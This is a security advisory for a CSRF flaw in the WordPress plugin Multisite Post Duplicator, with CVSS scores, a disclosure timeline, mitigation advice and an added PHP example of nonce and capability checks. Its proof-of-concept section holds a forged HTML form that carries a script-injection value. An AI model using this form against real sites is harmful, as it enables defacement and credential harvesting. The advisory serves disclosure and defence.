Advisory: CSRF vulnerability in Multisite Post Duplicator could allow an attacker to do almost anything an admin user can do

Vulnerability

The plugin contains a CSRF vulnerability that allows an attacker to copy content from one site of a multisite installation to another by tricking a logged-in administrator into submitting a forged form.

This could be used to add arbitrary HTML to the front-end of the site, which in turn could be used for defacement, for harvesting login credentials from authenticated users, or to do virtually anything a logged-in admin user can do.

This could also be used to view content not meant to be published.

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability:

  • Score: 5.8 (Medium)
  • Access Vector: Network
  • Access Complexity: Medium
  • Authentication: None
  • Confidentiality impact: Partial
  • Integrity impact: Partial
  • Availability impact: None

You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

Some of these values may need adjusting depending on the post IDs, blog IDs, etc.

<form method="POST" action="http://localhost/wp-admin/tools.php?page=mpd">
  <input type="text" name="mpd-post-status" value="draft">
  <input type="text" name="mdp-prefix" value="&lt;script&gt;alert(1)&lt;/script&gt;">
  <input type="text" name="action" value="add_foobar">
  <input type="text" name="el0" value="post">
  <input type="text" name="el1" value="1">
  <input type="text" name="el2" value="1">
  <input type="text" name="el3" value="1">
  <input type="text" name="duplicate-submit" value="Duplicate">
  <input type="submit">
</form>

Advisory timeline

  • 2016-11-01: Discovered
  • 2016-12-07: Tested version 1.1.3 and found the plugin no longer vulnerable to the attack as described
  • 2016-12-09: Advisory published

Mitigation/further actions

Update to version 1.1.3 or later.
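For plugin developers, the following is an added illustration of the protection that was missing, not code from the Multisite Post Duplicator plugin: a hypothetical WordPress handler for the "Duplicate" form that rejects a cross-site POST such as the proof-of-concept above. The function names, nonce action string, form field names and required capability are assumptions.

```php
<?php
// Added example (not the plugin's own code). Names and field layout are assumed.

// Form side: embed a nonce tied to a specific action. A third-party page cannot
// read this value, so a forged cross-site POST cannot supply it.
function mpd_example_render_form() {
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'tools.php?page=mpd' ) ); ?>">
        <?php wp_nonce_field( 'mpd_duplicate_post', 'mpd_nonce' ); ?>
        <input type="hidden" name="action" value="mpd_duplicate">
        <input type="text" name="mpd-prefix" value="">
        <input type="text" name="el1" value="">
        <input type="text" name="el2" value="">
        <input type="submit" name="duplicate-submit" value="Duplicate">
    </form>
    <?php
}

// Validate a submitted Duplicate request. Returns the sanitised inputs on
// success; on failure it terminates the request with wp_die() and a 403.
function mpd_example_validate_request() {
    // Capability check: refuses lower-privileged accounts even if they can
    // reach the Tools page.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'You are not allowed to duplicate posts.', 'mpd-example' ), '', array( 'response' => 403 ) );
    }

    // Nonce check: check_admin_referer() calls wp_die() when the nonce is
    // missing or invalid, so the PoC form (which has no nonce) stops here.
    check_admin_referer( 'mpd_duplicate_post', 'mpd_nonce' );

    // Sanitise inputs before they are stored. The prefix must also be escaped
    // on output so a value like "<script>" is rendered as text, not markup.
    return array(
        'prefix'    => sanitize_text_field( wp_unslash( $_POST['mpd-prefix'] ?? '' ) ),
        'post_id'   => absint( $_POST['el1'] ?? 0 ),
        'target_id' => absint( $_POST['el2'] ?? 0 ),
    );
}

// Handler: only runs the checks when this form was actually submitted.
function mpd_example_handle_duplicate() {
    if ( ! isset( $_POST['duplicate-submit'], $_POST['action'] ) || 'mpd_duplicate' !== $_POST['action'] ) {
        return;
    }
    $request = mpd_example_validate_request();
    // The copy itself would use $request['post_id'], $request['target_id']
    // and $request['prefix'], which are now validated, same-origin inputs.
    do_action( 'mpd_example_duplicate', $request );
}
add_action( 'admin_init', 'mpd_example_handle_duplicate' );
```

The essential change relative to the behaviour described in this advisory is that the handler never touches the copy logic unless both the capability check and the nonce check pass.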